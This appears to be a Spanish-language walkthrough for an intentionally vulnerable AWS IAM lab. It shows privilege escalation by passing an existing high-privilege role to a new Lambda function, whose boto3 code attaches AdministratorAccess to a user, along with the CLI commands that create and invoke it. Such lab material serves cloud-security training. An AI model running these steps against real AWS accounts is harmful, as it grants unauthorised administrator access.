PassExistingRoleToNewLambdaThenInvoke
Lab: IAM vulnerable
Laboratorio
Configuración Inicial

Explotación
Paso 1

Paso 2


Última actualización
Lab: IAM vulnerable




Última actualización
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": "iam:AttachUserPolicy",
"Resource": "arn:aws:iam::*:user/*"
}
]
}import boto3
def lambda_handler(event, context):
# crea un cliente de IAM usando la biblioteca Boto3
client = boto3.client('iam')
# adjunta la política "AdministratorAccess" al usuario
response = client.attach_user_policy(UserName='privesc15-PassExistingRoleToNewLambdaThenInvoke-user',
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess')
# devuelve la respuesta de la API de IAM de AWS
return response
aws lambda create-function --function-name privesc --runtime python3.6 --role arn:aws:iam::037572360634:role/privesc-high-role-Lambda --handler code.lambda_handler --zip-file fileb://function.zip --region us-east-2 --profile privesc15aws lambda invoke --function-name privesc output.txt --region us-east-2 --profile privesc15